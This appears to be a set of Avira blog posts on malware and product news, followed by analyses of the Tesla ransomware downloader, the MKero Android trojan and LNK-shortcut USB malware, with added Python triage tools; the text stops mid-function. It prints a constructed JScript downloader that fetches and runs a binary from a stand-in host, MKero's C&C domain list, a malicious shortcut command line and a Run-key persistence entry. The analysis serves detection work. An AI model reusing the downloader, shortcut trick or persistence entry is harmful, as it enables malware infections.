Mobile Banking Threats: Secure your mobile device


Nowadays we tend to use our mobile phones for browsing the Internet much more than our PCs. The reason is simple: it is easier and handier to read an e-mail or pay a bill on a mobile device than to turn the PC on, wait for the browser to load and so on. Unfortunately, we do not pay the same attention to our smartphone’s security as we do to our computers’. This is one reason for the more than 4 million financial attacks that targeted mobile phones in 2014 alone. In 2012 alone, one of the most notorious mobile banking threats, known as Zeus, stole about $47,000,000.

It’s safe to say that phishing e-mails and infected websites are the weapons of choice for secretly installing malware on victims’ phones. Attackers usually wait until their victims log into their online banking account to steal usernames and passwords. With an accomplice, injected code, they secretly add fields to the banking portal asking for the mobile phone number. To intercept SMS messages, including authorization codes from the bank, they use an infected app which is sent to the victim via SMS as a “security app”, together with a request to install it. It is very important to know that the bank appears as the “sender” of this SMS: the sender name of a text message is not authenticated and can be set to anything. That is why many people trust this sort of SMS without realizing that their bank account will soon be drained.

Avira helps you avoid this type of cyber-attack by offering a host of high-end security apps on both Android and iOS. Important features such as blocking banking Trojans and infected apps from ever getting onto your smartphone, or pinpointing your phone’s location on a map, will help you increase your level of security and protect your private data.

When in the modern Wild West, do as the banditos do. You can rely on Jesse James’ 6-step guide to counter the tactics used by gunslingers, hardened banditos and garden-variety hackers. Once you have read it, outlaws should have no chance of threatening your smartphone’s security.

Source : blog.avira.com

Avira Tech Support : Blog

Avira Antivirus Scout: On Early Access – Updated 2017


Update 2017

We learned a lot. More languages were added, bugs were fixed. The product is now at a stage where it can leave the Early Access phase, and where we remove the “Early access” sign from the download button.

Original Post

Did you know: our Avira Scout browser is now freely available to everyone as an early access version. There are a few things you might want to know before downloading it, though.

Why Early Access?

The short version: Chicken or egg?

To test our user interface we have to invite as many different people as possible. To achieve this diversity we wanted to present the user interface not only to our beta testers, who tend to be very technically skilled, but to the broader public.

In addition, we’re partnering with several open source projects. We announced that we will use their technology in our browser, but making the prototype available to them only after the partners sign a legal agreement is not satisfactory.

That’s the reason why we decided to release the browser as soon as it has serious benefits for the users – which is NOW: https://www.avira.com/en/avira-scout/

It is important to mention that the Beta test will continue and will soon receive the next iteration of our Scout browser.

What to expect

If you are a run-of-the-mill user who runs an out-of-the-box browser without any security add-ons, this browser will be quite a bit more secure than that. If you know what you are doing, though, and have a browser with AdBlock, anti-tracking, our ABS, a good search engine and NoScript, your browser should actually be more secure than our current setup. This will change, of course.

How often can you expect updates

Avira Scout will be updated when Chrome updates or when we are releasing bugfixes. Our early access phase will be running for a couple of months while the browser will receive new features and improvements.

The extensions and the menu will be updated more frequently.

Known issues

Your feedback helps us build the fast, secure browser you’ve always wanted. That’s why we release early. Naturally there are still kinks and we hope you’ll help us smooth them out.

Known issues we’re working on:

  • Not all video and audio pages will work just yet: only open video codecs are currently offered.
  • HTTPS-Everywhere and Privacy Badger may not support certain pages. Please give us your feedback to help us fix this.
  • Languages offered: German and English. The installer is in English only. We’re working of course to expand the list of available languages.
  • Not all features (e.g. desktop links) work on Windows 8 just yet.
  • Coming up: integrated antivirus scanner – working on it!

Source : blog.avira.com


Consumer Reports recommends Avira


Got a new computer for Christmas? Consumer Reports, America’s leading source of independent product reviews, has published its list of recommendations on how new computer owners can best set up their shiny new machines.

Security is at the very top of their list. They recommend ditching the pre-installed antivirus software that came with the new machine and replacing it with a free option – like Avira Free Antivirus. “In our test, it did a very good job of protecting against most threats,” wrote Donna Tapellini in her article.

Her other recommendations included ways to easily transfer old files over to your new machine, backup the hard drive, upgrade software, connect with the cloud, and yes, improve the sound quality. You can read her article here.

The detailed Consumer Reports guide to security software and product ratings is available online only to subscribers. If you are in North America, you will need to buy a copy at the local newsstand or visit your local library.

Consumer Reports, for those outside of America, is considered one of the fiercest and most independent consumer advocacy publications anywhere. Their reports on everything from cars to consumer electronics have the power to move stock markets, as several car manufacturers have discovered to their dismay. In the continental European market, the closest comparable organization is Stiftung Warentest and its test.de publication.

Source : blog.avira.com


Ransomware “Tesla”: Are ransomware writers kidding us?


Most of us have probably seen e-mails like the one below in our inbox at one point or another:

(Screenshot: the phishing e-mail with the attached “invoice”)

This is the typical phishing e-mail sent out by cybercriminals. They want to get the victim with “evil” social engineering: to succeed, they try to make the user open the attachment using scare tactics like unpaid bills, invoices, lost packages and so on. The icing on the cake is the attached copy of the “invoice”, so that it can be opened ASAP.

Compared to the phishing e-mails we received before, they no longer put the original “Tesla” ransomware file inside the archive. Instead they put an obfuscated JavaScript file in it. Cool! That makes them more flexible than ever before.

(Screenshot: the obfuscated JavaScript)

The obfuscation is a pretty good one from my point of view. It doesn’t let anyone understand at a glance what’s going on. But nothing is perfect … enough ;-). It may take several tries, but you can decode the script. The ease of this decoding leads me to the conclusion that its creation has been automated. Well, it seems that even the world of the criminals is changing.

An interesting fact is that to deploy ransomware, no knowledge of any programming language is needed anymore: Everything is offered ready to go on the darknet for anyone who is willing to pay. You can read a cool article I wrote on this topic over here.

(Screenshot: the decoded JavaScript)

But let’s get back to the malicious script. It’s just a downloader: it contains the download source for the “Tesla” ransomware, the location where the binary will be stored on the system (e.g. %temp%), and the code that runs the binary after some “quality checks” like a file size check.
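To give a concrete picture of what such a downloader looks like once the cheap obfuscation is peeled off, here is an added example, not code from the post or from Avira: a small Python triage helper that folds String.fromCharCode arrays and string concatenation in a JScript sample and then pulls out the indicators the post mentions (download URL, %TEMP% drop path, file size check, execution of the payload). The sample script is constructed for this example; the real downloader is only shown as a screenshot, and the Windows Script Host idioms used here (MSXML2.XMLHTTP, ADODB.Stream, WScript.Shell) are an assumption about how such scripts are typically written.

```python
"""Fold the two cheapest JScript obfuscation tricks (String.fromCharCode arrays
and literal concatenation) and pull downloader indicators out of the result."""
import re

# Constructed sample in the shape of a Windows Script Host downloader; the real
# script from the post is not reproduced, so the idioms below are an assumption.
SAMPLE_JS = r'''
var u = String.fromCharCode(104,116,116,112,58,47,47) + "pay" + "load." + "invalid/" + "get.php?id=" + "7";
var sh = new ActiveXObject("WScript.Shell");
var out = sh.ExpandEnvironmentStrings("%TEMP%") + "\\" + "upd" + "ate.exe";
var xh = new ActiveXObject("MSXML2.XMLHTTP");
xh.open("GET", u, false); xh.send();
if (xh.status == 200) {
  var st = new ActiveXObject("ADODB.Stream");
  st.Open(); st.Type = 1; st.Write(xh.ResponseBody); st.SaveToFile(out, 2); st.Close();
}
var fso = new ActiveXObject("Scripting.FileSystemObject");
if (fso.GetFile(out).Size > 150000) { sh.Run(out, 0, false); }   // "quality check" before execution
'''

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')


def fold_strings(src: str) -> str:
    """Replace String.fromCharCode(...) with its literal, then merge adjacent
    literals ("a" + "b" -> "ab") until nothing changes."""
    def charcode(m: re.Match) -> str:
        return '"' + "".join(chr(int(n)) for n in m.group(1).split(",")) + '"'

    src = FROMCHARCODE.sub(charcode, src)
    while True:
        src, n = CONCAT.subn(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if n == 0:
            return src


def extract_indicators(src: str) -> dict:
    """Indicators an analyst wants from a WSH downloader after string folding."""
    folded = fold_strings(src)
    return {
        "urls": re.findall(r'https?://[^\s"\']+', folded),          # download source(s)
        "activex": sorted(set(re.findall(r'ActiveXObject\("([^"]+)"\)', folded))),
        "writes_to_temp": "%TEMP%" in folded.upper(),               # drop location
        "size_check": bool(re.search(r"\.Size\s*[<>]=?\s*\d+", folded)),
        "runs_payload": bool(re.search(r"\.Run\(", folded)),
    }


if __name__ == "__main__":
    for key, value in extract_indicators(SAMPLE_JS).items():
        print(f"{key}: {value}")
```

The folding is deliberately dumb: it handles only the two patterns shown, which is enough to surface the URL and drop path from the kind of script described above, and it fails loudly (no URL found) rather than guessing when a sample uses something heavier. Real samples often rotate the URL list and the size threshold between builds, which is exactly the flexibility the post describes.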

Interesting? I believe so, because the criminals have changed the way they ensure that the ransomware lands on the victim’s computer. They now also have the possibility of using different URLs as sources. And, last but not least, it seems to be easier for them to deploy new scripts than to adjust the binary itself when it comes to bypassing antivirus solutions in order to stay undetected. With more samples to choose from they have more chances of successfully infecting your device.

You might be confused by the last sentence, so let me explain: once we analyzed the Tesla ransomware file in more detail, it seemed that they didn’t invest any additional time in the “Tesla” ransomware files themselves. The latest binaries we have received and analyzed are already covered by our detections from more than three years ago! That’s friggin’ old-school 🙂 !

(Screenshot: how to restore)

Nope, that’s no joke. We’ve also seen that, after executing yet another script, the latest Avira launcher is downloaded instead of the Tesla ransomware binary. They took our launcher and put it on their command and control server.

(Screenshot: the Avira launcher being downloaded)

Please note: we NEVER collaborate with cybercriminals or force anything like this! We also don’t spread malware with our launcher! But we want to say thanks to everyone who wants to promote our product for a better protected world nonetheless! 🙂

In the end it shows us once again how strong our detection patterns are when it comes to daily threats. It’s funny to find “new” samples which we’ve already been detecting for more than three years. But anyway, don’t forget our Avira Protection Cloud: in combination with our main antivirus it becomes a powerful tool and a much stronger protective shield. So, ENABLE the Avira Protection Cloud in our product, and live free.

Source : blog.avira.com


How much is your streaming account worth?


In fact, more and more people seem to do so. And it’s no wonder: choosing what you want to watch, and when, definitely has a lot of pros. With this rise in popularity it should come as no surprise that account theft for those (and other) online services is hot, too. So how much would one have to pay to get access to someone else’s account? Apparently not much.

According to The Register “premium sports accounts sell for about $10 while streaming TV can be bought for as low as 50 cents, far less than the $10 monthly subscription.

Comic fans can buy a stolen Marvel Unlimited lifetime account – meaning the victim is unlikely to shutter it – for 50 cents compared to the $10 monthly fee.”

The marketplace, which is accessible via the Tor network, also offers premium Spotify, Comcast Xfinity, Uber, Apple and Lynda training video accounts, as well as drugs, weapons, malware and, of course, credit cards.

The stolen accounts also come with care instructions for the “new” (and apparently not too bright) owners: make sure not to change the e-mail address, or the legitimate owner will notice.

So, now that you know how much your account might be worth out there in the wild (not a lot, apparently, compared to what you are paying for it), you should make sure that it remains your own and is not sold to who knows how many other people.

  • Make sure you are using a good antivirus that will guard your PC from trojans, keyloggers, and other malware.
  • Use a unique password for each of your accounts. Make it a good one.
  • Change your password regularly.

Source : blog.avira.com


Avira now identifies SilverPush ad-tracking as malware


Even worse, they are doing it right in front of you – but you don’t know it.

Welcome to the world of cross-device tracking where the only thing you have to lose is your privacy as an autonomous human being.

This is no futuristic nightmare scenario, it is happening now. But it does not have to happen to people using Avira antivirus software. Avira, the German security company, now detects the SilverPush tracking software as Trojan malware.

Devices running Avira security software will now warn users if this software is present or about to be downloaded. If the software is already present, Avira will either remove or block it from operating. The new detection will protect the millions using Avira security software or the Avira anti-malware engine in their device.

The SilverPush technology enables advertisers to put an ultrasonic “sound beacon” signal into TV commercials which people can’t hear, but their devices can. This signal is picked up by apps which include the SilverPush software, and they respond with a message sent back to SilverPush identifying where the ad was seen and the precise broadcast channel. That’s just the start: the message also identifies the exact ID of the device, the Wi-Fi router’s MAC address, details about the device’s operating system and, best of all, the user’s phone number.

After putting the pieces together, SilverPush and its clients can have a very detailed portrait of the end consumer’s preferences. It’s a marketing dream, a technology that enables cross-device tracking and targeted ads, but who is taking care of the user and their need for privacy?

“What user privacy?—and this is a big, big problem for us,” says Travis Witteveen, CEO of AVIRA. “The functionality of the SilverPush software is way out of line for a legitimate advertising software development kit – given the way this software sucks up data on the individual user, the extent of this data, and the insecure transport of this data back to SilverPush – so we are now detecting this as a Trojan.”

Analysis from the Avira Virus Lab shows the detailed level of user data sucked up and broadcast by SilverPush. “They even transmit the user’s phone number – which is certainly classified as personally identifiable information … along with other data like the device’s IMEI or MAC address – details which identify the individual device,” pointed out Mr. Witteveen. “With this amount of data, SilverPush could order and deliver a pizza for viewers when they sit down to watch a Western on TV.”

SilverPush is not the only tech firm working on cross-device tracking. Others active in this area include Adobe, Drawbridge, and Flurry. But thanks to the way SilverPush sucks in and handles user data, they have been at the center of a media storm involving the US Federal Trade Commission and its review of cross-device tracking of users by marketing firms.

“The best solution is increased transparency and a robust and meaningful opt-out system. If cross-device tracking companies cannot give users these types of notice and control, they should not engage in cross-device tracking,” stated the Center for Democracy & Technology, an American advocacy group for internet privacy in a letter to the FTC.

At Avira, we agree with this position. And until these details are figured out, we will identify SilverPush for what it is. As the CDT has pointed out in the same letter, privacy is important and recent polls show that 91% of Americans feel like they have lost control over the way their personal data is being collected and used.

Source : blog.avira.com


Avira, time2win and eSports … it’s time to win!


For those of you who don’t know what eSports is, let me explain. eSports is short for “electronic sports” and is a term for competitive video gaming. It’s exactly what you probably think it is by now: two gamers sitting in front of their PCs, playing games against each other. So far, so good. But eSports is more: it’s professional gamers sitting in front of their PCs, playing live before an audience of several thousand spectators, competing for a huge prize pool. eSports players are becoming almost as famous as the “real” sports stars, with fans screaming their names and asking for autographs. The latest huge tournament, the League of Legends World Championship final in Berlin, Germany, sold out its 17,000 tickets in just 90 seconds. You find this unbelievable? Then take a look at this video.

As of now, this fame and fortune is only reserved for the best – and that’s where our new partner, time2win comes in. “We strive to elevate eSports onto a new level”, says Björn Rüssel, COO of time2win in the press release. “Competitive eSports including prize money should be accessible to everybody. Everybody deserves a realistic chance to win prizes!”

Besides time2win tournaments, with prize money set by time2win and its partners, other modes like challenges and buy-in tournaments will be available on the platform as well. “We know that players don’t just want to participate in our own tournaments, but also try and test the other features we offer. The starting capital for our money features can be won in our time2win tournaments”, comments COO Björn Rüssel.

By the way, the best time to join the fun is now, with the stress test starting on November 9th. In this open test phase of the platform, 41,000 euros will be distributed as prize money and gaming equipment worth over 10,000 euros will be raffled off.

With all the fun you’re having, you shouldn’t forget the most important thing: make sure that your PC stays secure. That’s what we at Avira are here for.

Source : blog.avira.com


Dissecting MKero, the premium SMS service subscriber trojan found on Google Play


In this malware-everywhere context, the best way to stay safe is to install software only from trusted locations, like Google Play. Starting in 2011, Google managed to reduce the amount of malicious applications in its store by using an in-house automated malware checker called Google Bouncer.
However, since nowadays everything is continuously evolving and adapting, nothing is bulletproof, and the bad guys have found various ways (e.g. delayed backdoor trojans, the Dendroid malware) to trick the automated checker and upload malicious apps to the official store.

This is also the case for today’s case study, a trojan from the MKero family which was recently discovered in Google Play masked as normal gaming applications:

  • com.likegaming.gtascs (md5 14cdf116704af262174eb0678fd1b368)
  • com.likegaming.rcdtwo (md5 39b84a45e82d547dc967d282d7a7cd1e)
  • com.likegaming.ror (md5 69820ddcab4fe0c6ff6a77865abf30b9)
  • com.likegaming.rprs (md5 8c496957d787861c0b11789a227a32c7)
  • com.likestudio.offroadsimulatoreone (md5 c7478eff0c2eca8bcb5d0611bfec54d6)

This type of malware was first discovered in 2014, but it has now been found in the official Google store for the first time, which means that its developer(s) added special code to bypass Bouncer. Once installed on the device, the trojan’s logic is very simple: it secretly subscribes the victim to premium SMS services for which the user will be charged monthly, with a minimum of $0.50 per message. In addition to bypassing Bouncer, the main peculiarity of this malware is its ability to automatically “solve” the CAPTCHA image required in the subscription process by sending it to an online, real-time image-to-text service. Furthermore, this trojan is completely silent during installation and, more importantly, during the infection, by hiding any incoming SMS sent by the premium subscription services.

How exactly is it doing its “thing”?

We know what this trojan does and how it passes the most complicated task (CAPTCHA solving), so it is definitely worth digging further into its internals to find out exactly how it works.

For our analysis we’ll use the com.likegaming.gtascs (md5 14cdf116704af262174eb0678fd1b368) APK from the list of infected packages above.

Let’s start by checking the internal APK structure. This can be done by extracting it (or just listing the files) with any zip tool (e.g. unzip, 7-Zip, WinZip):
$ tree -L 2
├── AndroidManifest.xml
├── assets
│   └── bin
├── classes.dex
├── lib
│   ├── armeabi-v7a
│   └── x86
├── META-INF
│   ├── CERT.RSA
│   ├── CERT.SF
│   └── MANIFEST.MF
├── res
│   ├──[skipped res folders]
└── resources.arsc

Nothing special so far: all the usual files (manifest, classes, resources) and folders (res, lib, assets) are there and they seem to contain the usual APK data.

Since AndroidManifest.xml is the entry point of any APK, we’ll continue the analysis there. To convert the binary XML into a human-readable format we need apktool, which will also do some extra decoding required later:
$ apktool if com.likegaming.gtascs.apk
I: Framework installed to: $HOME/apktool/framework/127.apk
$ apktool d com.likegaming.gtascs.apk
I: Using Apktool 2.0.1 on com.likegaming.gtascs.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: $HOME/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

From the decoded XML file one can check various elements: the package name (com.likegaming.gtascs in our case), requested permissions, activities, services and receivers.
Looking at the permissions, some of them seem very suspicious (see the highlighted lines) for an application which is supposed to be a normal game:

(Screenshot: requested permissions, suspicious entries highlighted)

Thus the requested permissions are the first suspicious thing about this app and, if the user properly cross-checks them against the app’s scope and description, the installation should be aborted at this point. But we all know that this won’t happen too often; usually the requested permissions are simply ignored and accepted by the regular user.

Next, let’s check the main activity declaration. Nothing special about the name, so we’ll have to dig into its code later on:

(Screenshot: main activity declaration)

There are also various other activities in the manifest, but we’ll first focus on the declared services which, by definition, are background tasks that run even when the user is not interacting with the application. There’s not much information there, though, just some suspicious names for the services starting with Mk:

(Screenshot: declared services)

Things get more interesting in the receivers part: there are two of them with a priority of 1000 in their intent-filter element:

(Screenshot: declared receivers with priority 1000)

From the manifest file we have found the following: suspicious permissions, the name of the main activity, the services the app can start, and two high-priority receivers (one for the SMS_RECEIVED intent and the other for the BOOT_COMPLETED intent).
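Added example, not from the post: a Python script that automates this manifest triage on the decoded AndroidManifest.xml that apktool writes. The manifest below is constructed for the example; the package, service and receiver names and the priority value follow the post, while the exact permissions (the post shows them only in a screenshot) are assumed from the SMS-subscription behaviour it describes.

```python
"""Triage a decoded AndroidManifest.xml (as written by `apktool d`) for the traits
flagged in the MKero analysis: SMS/boot permissions and high-priority receivers
for SMS_RECEIVED and BOOT_COMPLETED."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions a plain game has no business requesting.  The sample's real set is
# only visible in the post's screenshot; this list is an assumption.
SUSPICIOUS_PERMISSIONS = {
    "android.permission.SEND_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS", "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.READ_PHONE_STATE",
}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
BOOT_COMPLETED = "android.intent.action.BOOT_COMPLETED"
WATCHED_ACTIONS = {SMS_RECEIVED, BOOT_COMPLETED}

# Constructed manifest; component names and priorities follow the post.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.likegaming.gtascs">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="game">
    <activity android:name="com.unity3d.player.UnityPlayerActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name="com.mk.lib.MkProcess"/>
    <service android:name="com.mk.lib.MkPages"/>
    <receiver android:name="com.mk.lib.receivers.MkStart">
      <intent-filter android:priority="1000">
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <receiver android:name="com.mk.lib.receivers.MkSms">
      <intent-filter android:priority="1000">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def triage_manifest(xml_text: str) -> dict:
    """Collect the manifest facts an analyst checks first: package, suspicious
    permissions, services, and receivers listening for watched actions."""
    root = ET.fromstring(xml_text)
    name_attr = ANDROID_NS + "name"
    perms = {p.get(name_attr) for p in root.iter("uses-permission")}
    receivers = []
    for rcv in root.iter("receiver"):
        for filt in rcv.iter("intent-filter"):
            actions = {a.get(name_attr) for a in filt.iter("action")} & WATCHED_ACTIONS
            if actions:
                receivers.append({
                    "class": rcv.get(name_attr),
                    "actions": sorted(actions),
                    "priority": int(filt.get(ANDROID_NS + "priority", "0")),
                })
    # A receiver for SMS_RECEIVED with elevated priority runs before the stock
    # messaging app, which is what lets malware read and swallow the SMS.
    sms_interceptor = "android.permission.RECEIVE_SMS" in perms and any(
        SMS_RECEIVED in r["actions"] and r["priority"] > 0 for r in receivers)
    return {
        "package": root.get("package"),
        "suspicious_permissions": sorted(perms & SUSPICIOUS_PERMISSIONS),
        "services": [s.get(name_attr) for s in root.iter("service")],
        "high_priority_receivers": receivers,
        "likely_sms_interceptor": sms_interceptor,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage_manifest(SAMPLE_MANIFEST), indent=2))
```

On a real decoded APK, pass the contents of the AndroidManifest.xml that apktool produced instead of SAMPLE_MANIFEST. The receiver check also explains the blocking of SMS messages described later in the post: a receiver registered for SMS_RECEIVED with a higher priority than the messaging app runs first and, on Android versions before 4.4, can call abortBroadcast() so the user never sees the message.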

It’s now time to look at the code behind every important activity, service and receiver found above. For this, the classes.dex file, which is in Dalvik bytecode format, must be converted into a human-readable form: apktool already disassembled it to smali when decoding the manifest, but it’s also possible to convert the dex to a jar (e.g. with dex2jar) and open the jar with a Java decompiler like JD-GUI to view the Java code.

Analyzing the main activity, com.unity3d.player.UnityPlayerActivity, turns out to be a dead end because it basically calls code from the legitimate game engine framework, com.unity3d. Therefore nothing malicious happens when the user is actually opening and playing the game. That means the malicious code is activated by other means, like broadcast receivers. So let’s continue by checking the code of the two high-priority broadcast receivers found in the manifest, com.mk.lib.receivers.MkStart and com.mk.lib.receivers.MkSms.

The first receiver, com.mk.lib.receivers.MkStart, which is called whenever the phone is (re)started, schedules an intent which repeatedly starts (with a 1h delay) a service, com.mk.lib.MkProcess:

(Screenshot: MkStart receiver code)

Looking at the onStartCommand method of the com.mk.lib.MkProcess service, it appears that it starts a new background thread that executes the com.mk.lib.MkProcess$Commands.doInBackground method, which does the whole magic (it communicates with the C&C servers to get the URL(s) of the premium SMS servers and then starts the registration process):

(Screenshot: MkProcess$Commands.doInBackground)

Now let’s try to find the C&C domains, which seem to be returned by the com.mk.lib.heplers.Functions$getDomains method (note the spelling error: heplers instead of helpers). Unfortunately, my version of JD-GUI is unable to decompile the com.mk.lib.heplers.Functions class (probably because of the obfuscation), so we’ll look at the smali code instead, in smali/com/mk/lib/heplers/Functions.smali. In the smali, the method calls another private method, com.mk.lib.heplers.Functions$appDomains, which seems to directly return the names of the domains used:

(Screenshot: appDomains method in smali, obfuscated strings highlighted)

Unfortunately, as with the whole application, the strings are heavily obfuscated (see the highlighted areas), so they do not make much sense in this form. Luckily, the domains seem to be decoded in place with the com.mk.lib.heplers.Data$Http.V method. Looking at the decoding method, one can see that it does a lot of heavy lifting (multiple loops with various bitwise operators) and can’t easily be reversed by hand, so we need another way to obtain the original strings.

Since the method is implemented in the decompiled jar, we can write a simple Java program which just calls the decoding method with the obfuscated string as input. Trying that directly gives a compilation error, because the decode function is static and not accessible from outside its package. Fortunately, this can be bypassed using Java reflection: I implemented a simple Java program which loads the method, makes it accessible, calls it with the provided input and finally prints the result on standard output:

(Screenshot: MethodCaller.java)

Finally, running the above Java program with our strings, we get the following results:
$ java -cp .:classes-dex2jar.jar MethodCaller 'com.mk.lib.heplers.Data$Http' V "obfuscated_string_1" "obfuscated_string_2"

nosepudymy.biz,areripydok.com,vozicokeboh.biz,hekisanosih.com,yfaqoqysusyfyfa.biz,dewekasadito.biz,zerawyhifuwude.biz,eluheqizomado.biz,ufadaqim.biz,imuwobulok.biz,horodityrowoboni.biz,uqikoxomyturo.biz,wyfokypynogipu.biz,sabumorazuh.biz,ofudylopixen.biz,episykuj.com,rodujuhocafy.biz

ivosupawy.biz,cesobagixisyn.biz,menizyxoxa.biz,ruqijireji.biz,ecymotolimybocos.biz,ozozoqimykoric.biz,fyvefiwo.biz,zehenivi.biz,lytevabasic.biz,ynegymeriw.biz,jytuvyducemek.biz,isucuzyzososare.biz

Thus the malware tries to communicate with the first responsive C&C server from the above lists and, once it gets a response, starts the SMS subscription process.

Another interesting service is com.mk.lib.MkPages, which handles the CAPTCHA: after extracting the image from the subscription page, it sends it to http://antigate.com and then waits up to 2.5 minutes to receive the text. Check the following highlighted text from the com.mk.lib.MkPages$doInBackground method, after deobfuscating the strings:

(Screenshot: deobfuscated antigate.com strings in MkPages$doInBackground)

Let’s move on to the second receiver, com.mk.lib.receivers.MkSms, which is called before any other broadcast receiver (due to its high priority, 1000) whenever the device receives an SMS message. After decoding the strings in its onReceive method, one can see that this receiver is responsible for extracting the SMS code and activation link needed in the subscription process, and also for blocking further SMS messages coming from the subscription server:

(Screenshot: MkSms receiver onReceive method)

That is pretty much all about the internals of this trojan. Coming back to the Bouncer bypass, we can now see that the malware passed undetected due to the delayed infection: it waits 1h before starting the subscription process, which is longer than an automated checker observes an app for.

In conclusion, no matter how smart the (automated) application checkers are, the bad guys will always find new and sophisticated methods to infiltrate malicious code even into official stores. In these circumstances, Avira helps you fight potential malware, so don’t wait to be infected: install our free Android product today.

Source : blog.avira.com


LNK Files – Shortcuts to Faster Infections


These shortcut files are actually called Shell Link files; Microsoft’s filename extension for them is “.LNK”.

Let’s dig a little deeper and check the typical properties of an example LNK file. Just right-click on the shortcut and select “Properties”. There are several options which can be changed; here we will focus on the “Target” field, which contains the path to the application or folder:

“C:\Program Files (x86)\Avira\Avira Antivirus\avcenter.exe”

Looks easy, right? When you click on the shortcut it runs the command specified here. In this case our trusted Avira Antivirus is launched. This is what you expect and want when clicking on a shortcut.

Unfortunately these shortcut files also have drawbacks, since you don’t know exactly what hides behind them without explicitly looking. At Avira we are currently seeing a trend that more and more malware threats are using this kind of propagation method. You can follow this and other trends by visiting our Avira Threats Landscape.

Malware authors are starting to use this method because nowadays most novice users know that clicking on a suspicious executable file might be dangerous for their systems, whereas clicking on a shortcut is normally not associated with bad behavior.

I’d like to show you how malware actually misuses the usually helpful LNK files with an example of an actual in-the-wild malware detection named VBS/LNK.Jenxsus.Gen.

This variant uses LNK files to spread an infection via removable drives. The trick is very simple: it creates shortcuts to your files and folders stored on the USB stick and then hides the originals from you.

Let’s see what a folder structure looks like once the USB drive is infected.

(Screenshot: folder view of an infected USB drive)

Nothing unusual here at first glance, right? Except maybe that the icons all have a small arrow in the bottom left corner, which indicates that they are actually shortcut files. But you can still access all your files and folders when clicking on them.

We will now take a closer look at what is actually hidden behind the shortcut files by telling Windows Explorer that we want to see all “hidden system files”:

(Screenshot: directory view with hidden system files shown)

When we focus on “avira-logo” you can see there are actually two files. One is the LNK file and the highlighted one is the actual “hidden” JPG image file.

This means that when you click on a trusted file on the USB drive you are actually clicking on the shortcut, which will execute the following command stored in the LNK target instead of just opening the image:

C:\WINDOWS\system32\cmd.exe /c start dlbfbiicvg.vbs&start avira-logo.jpg&exit

Target path of an infected LNK file.

What this command does is silently execute the malicious “dlbfbiicvg.vbs” via cmd.exe and then use “start avira-logo.jpg” to open the file you clicked on, to avoid any suspicion.

Additionally, the malware adds a Run key entry to the Registry so that it is executed at every system boot and can infect other USB drives when they are plugged into the system.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"dlbfbiicvg"="wscript.exe //B \"C:\\DOCUME~1\\USERNAME\\LOCALS~1\\Temp\\dlbfbiicvg.vbs\""

Example of a malicious Run-Key added by the malware.

The file name and the Registry value name of the Run key are randomly generated by the malware on each infected system.
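Added example, not code from the post: a minimal Python parser for the Shell Link format (header, optional LinkInfo with the local base path, and the StringData fields that hold the command line arguments), with a heuristic that recognises the chained “start script & start decoy” pattern in the target shown above and a check for the kind of Run-key value shown. The LNK bytes are built inside the example so it runs without a real shortcut; a real file normally also carries a LinkTargetIDList, which the parser skips rather than decodes.

```python
"""Minimal Shell Link (.LNK) parser plus a heuristic for the decoy-shortcut
pattern described in the post: cmd.exe launches a dropped script, then opens
the file the user believed they clicked."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return flags, file attributes, local base path and StringData of a LNK."""
    size, clsid, flags, attrs = struct.unpack_from("<I16sII", data, 0)
    if size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = LNK_HEADER_SIZE
    if flags & HAS_IDLIST:                          # skip LinkTargetIDList
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    local_base = None
    if flags & HAS_LINKINFO:
        li_size, _hdr, li_flags, _vol, lbp_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:                          # VolumeIDAndLocalBasePath
            end = data.index(b"\x00", pos + lbp_off)
            local_base = data[pos + lbp_off:end].decode("cp1252")
        pos += li_size
    out = {"flags": flags, "file_attributes": attrs, "local_base_path": local_base}
    for bit, key in STRING_FIELDS:                  # StringData, fixed order
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, pos)
            pos += 2
            if flags & IS_UNICODE:
                out[key] = data[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                out[key] = data[pos:pos + count].decode("cp1252")
                pos += count
    return out


def build_lnk(target: str, arguments: str) -> bytes:
    """Construct a small LNK (LinkInfo + Unicode arguments) for the example."""
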